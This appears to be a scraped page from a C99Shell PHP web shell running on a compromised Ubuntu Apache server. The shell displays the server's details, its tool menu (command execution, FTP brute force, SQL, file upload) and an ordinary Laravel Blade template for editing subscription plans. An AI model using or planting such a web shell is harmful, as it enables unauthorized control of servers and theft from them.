!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/resources/views/admin/plan/   drwxr-xr-x
Free 13.36 GB of 57.97 GB (23.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit.blade.php (8.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app')
@section('head')
@include('layouts.partials.headersection',['title'=>'Edit Plan'])
@endsection
@section('content')
<div class="row">
    <div class="col-12 mt-2">
        <div class="card">
            <div class="card-body">
                <form method="post" action="{{ route('admin.plan.update',$info->id) }}" class="basicform">
                    @csrf
                    @method('PUT')
                    <div class="row">
                        <div class="col-sm-8">
                            <div class="form-group">
                                <label>{{ __('Plan Name') }}</label>
                                <input type="text" name="name" class="form-control" required value="{{ $info->name }}"> 
                            </div>

                            <div class="form-group">
                                <label>{{ __('Plan description') }}</label>
                                <input type="text" class="form-control" required="" name="description" value="{{ $info->description }}"></textarea>
                            </div> 


                            <div class="form-group">
                                <label>{{ __('Plan Price') }}</label>
                                <input type="number" step="any" name="price" class="form-control" required value="{{ $info->price }}"> 
                            </div>
                            

                            <div class="form-group">
                                <label>{{ __('Product Limit') }}</label>
                                <input type="number"  name="product_limit" class="form-control" required value="{{ $plan_info->product_limit }}"> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Storage Limit') }} (MB)</label>
                                <input type="number"  name="storage" class="form-control" required  value="{{ $plan_info->storage }}"> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Customer Limit') }}</label>
                                <input type="number" value="{{ $plan_info->customer_limit }}"  name="customer_limit" class="form-control" required> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Category Limit') }}</label>
                                <input type="number" value="{{ $plan_info->category_limit }}"  name="category_limit" class="form-control" required> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Location Limit') }}</label>
                                <input type="number" value="{{ $plan_info->location_limit }}"  name="location_limit" class="form-control" required> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Brand Limit') }}</label>
                                <input type="number" value="{{ $plan_info->brand_limit }}"  name="brand_limit" class="form-control" required> 
                            </div>
                            <div class="form-group">
                                <label>{{ __('Variation Limit') }}</label>
                                <input type="number" value="{{ $plan_info->variation_limit }}"  name="variation_limit" class="form-control" required> 
                            </div>
                            

                            <div class="form-group">
                                <button class="btn btn-primary basicbtn" type="submit" >{{ __('Update') }}</button>
                            </div>
                        </div>
                        <div class="col-sm-4">
                            
                            <div class="form-group">
                                <label>{{ __('Duration') }}</label>
                                <select class="form-control" name="days">
                                    <option value="365"@if($info->days==365) selected="" @endif>{{ __('Yearly') }}</option>
                                    <option value="30"@if($info->days==30) selected="" @endif>{{ __('Monthly') }}</option>

                                    <option value="7"@if($info->days==7) selected="" @endif>{{ __('Weekly') }}</option>
                                </select>
                            </div>

                            <div class="form-group">
                                <label>{{ __('Inventory') }}</label>
                                <select class="form-control" name="inventory">
                                    <option @if($plan_info->inventory  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->inventory  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Custom Domain') }}</label>
                                <select class="form-control" name="custom_domain">
                                    <option @if($plan_info->custom_domain  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->custom_domain  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>

                            
                            <div class="form-group">
                                <label>{{ __('POS') }}</label>
                                <select class="form-control" name="pos">
                                    <option @if($plan_info->pos  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->pos  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Customer Panel Access') }}</label>
                                <select class="form-control" name="customer_panel">
                                    <option @if($plan_info->customer_panel  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->customer_panel  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('PWA') }}</label>
                                <select class="form-control" name="pwa">
                                    <option @if($plan_info->pwa  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->pwa  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Whatsapp modules') }}</label>
                                <select class="form-control" name="whatsapp">
                                    <option @if($plan_info->whatsapp  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->whatsapp  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Support') }}</label>
                                <select class="form-control" name="live_support">
                                    <option @if($plan_info->live_support  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->live_support  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('QR code') }}</label>
                                <select class="form-control" name="qr_code">
                                    <option @if($plan_info->qr_code  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->qr_code  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Facebook Pixel') }}</label>
                                <select class="form-control" name="facebook_pixel">
                                    <option @if($plan_info->facebook_pixel  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->facebook_pixel  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Custom Css') }}</label>
                                <select class="form-control" name="custom_css">
                                    <option @if($plan_info->custom_css  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->custom_css  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Custom Js') }}</label>
                                <select class="form-control" name="custom_js">
                                    <option @if($plan_info->custom_js  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->custom_js  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('GTM') }}</label>
                                <select class="form-control" name="gtm">
                                    <option @if($plan_info->gtm  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->gtm  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            <div class="form-group">
                                <label>{{ __('Google Analytics') }}</label>
                                <select class="form-control" name="google_analytics">
                                    <option @if($plan_info->google_analytics  == true) selected @endif  value=true >{{ __('Enable') }}</option>
                                    <option  @if($plan_info->google_analytics  == false) selected @endif value=false >{{ __('Disable') }}</option>
                                </select>
                            </div>
                            
                            
                            <div class="form-group">
                                <label>{{ __('Is Featured ?') }}</label>
                                <select class="form-control" name="featured">
                                    <option value="0" @if($info->featured==0) selected="" @endif>{{ __('No') }}</option>
                                    <option value="1" @if($info->featured==1) selected="" @endif>{{ __('Yes') }}</option>
                                </select>
                            </div>
                            
                            <div class="form-group">
                                <label>{{ __('Status') }}</label>
                                <select class="form-control" name="status">
                                    <option value="1" @if($info->status==1) selected="" @endif>{{ __('Enable') }}</option>
                                    <option value="0" @if($info->status==0) selected="" @endif>{{ __('Disable') }}</option>
                                </select>
                            </div>
                        </div>


                    </div>


                    
                </form>


            </div>
        </div>
    </div>
</div>
@endsection

@push('js')
<script src="{{ asset('assets/js/form.js') }}"></script>
@endpush

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--